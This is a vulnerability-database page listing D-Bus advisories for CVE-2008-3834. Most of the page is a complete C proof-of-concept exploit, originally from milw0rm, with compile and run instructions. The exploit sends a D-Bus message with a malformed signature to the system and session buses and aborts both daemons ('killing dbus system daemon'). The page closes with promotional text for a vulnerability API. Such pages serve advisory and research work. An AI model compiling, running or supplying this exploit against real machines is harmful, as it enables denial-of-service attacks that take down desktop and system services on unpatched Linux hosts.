| Reporter | Title | Published | Views | Family All 84 |
|---|---|---|---|---|
| D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit | 19 Jan 200900:00 | – | zdt | |
| CentOS 5 : dbus (CESA-2009:0008) | 6 Jan 201000:00 | – | nessus | |
| CentOS 5 : dbus (CESA-2010:0018) | 8 Jan 201000:00 | – | nessus | |
| Debian DSA-1658-1 : dbus - programming error | 24 Oct 200800:00 | – | nessus | |
| Fedora 9 : dbus-1.2.4-1.fc9 (2008-8764) | 10 Oct 200800:00 | – | nessus | |
| GLSA-200901-04 : D-Bus: Denial of Service | 12 Jan 200900:00 | – | nessus | |
| Mandriva Linux Security Advisory : dbus (MDVSA-2008:213) | 23 Apr 200900:00 | – | nessus | |
| Mandriva Linux Security Advisory : dbus (MDVSA-2009:256-1) | 7 Oct 200900:00 | – | nessus | |
| MiracleLinux 3 : dbus-1.0.0-7AXS3.1 (AXSA:2009-08:01) | 14 Jan 202600:00 | – | nessus | |
| MiracleLinux 3 : dbus-1.1.2-12.AXS3.1 (AXSA:2010-35:01) | 14 Jan 202600:00 | – | nessus |
/*
* cve-2008-3834.c
*
* D-Bus Daemon Denial of Service < 1.2.4
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834
* $ ./cve-2008-3834
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834
*
* The dbus_signature_validate function in the D-bus library (libdbus)
* before 1.2.4 allows remote attackers to cause a denial of service
* (application abort) via a message containing a malformed signature,
* which triggers a failed assertion error.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <dbus/dbus.h>
#define DEST "org.freedesktop.ExampleService"
#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"
#define PATH "/org/freedesktop/sample/object/name"
#define SIGNAL "ExampleMethod"
int
main(int argc, char *argv[])
{
char sig[8];
uint32_t val = 0xdeadbeef;
DBusMessage *message;
DBusConnection *system, *session;
DBusMessageIter iter1, iter2, iter3, iter4;
printf("[+] creating malicious dbus message...\n");
message = dbus_message_new_signal(PATH, NAME, SIGNAL);
if (!message) {
printf("[-] error: could not create dbus message\n");
return 1;
}
if (!dbus_message_set_destination(message, DEST)) {
printf("[-] error: could not create set dbus destination\n");
return 1;
}
sig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;
sig[1] = DBUS_STRUCT_BEGIN_CHAR;
sig[2] = DBUS_TYPE_INT32;
sig[3] = DBUS_TYPE_INT32;
sig[4] = DBUS_STRUCT_END_CHAR;
sig[5] = DBUS_TYPE_INT32;
sig[6] = DBUS_DICT_ENTRY_END_CHAR;
sig[7] = '\0';
dbus_message_iter_init_append(message, &iter1);
dbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);
dbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);
dbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);
dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
dbus_message_iter_close_container(&iter3, &iter4);
dbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);
dbus_message_iter_close_container(&iter2, &iter3);
dbus_message_iter_close_container(&iter1, &iter2);
printf("[+] connecting to dbus system daemon...\n");
system = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);
if (system) {
printf("[+] killing dbus system daemon...\n");
dbus_connection_send(system, message, NULL);
dbus_connection_flush(system);
dbus_connection_unref(system);
} else {
printf("[-] error: could not connect to dbus system daemon\n");
}
printf("[+] connecting to dbus session daemon...\n");
session = dbus_bus_get(DBUS_BUS_SESSION, NULL);
if (session) {
printf("[+] killing dbus session daemon...\n");
dbus_connection_send(session, message, NULL);
dbus_connection_flush(session);
dbus_connection_unref(session);
} else {
printf("[-] error: could not connect to dbus session daemon\n");
}
dbus_message_unref(message);
return 0;
}
// milw0rm.com [2009-01-19]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation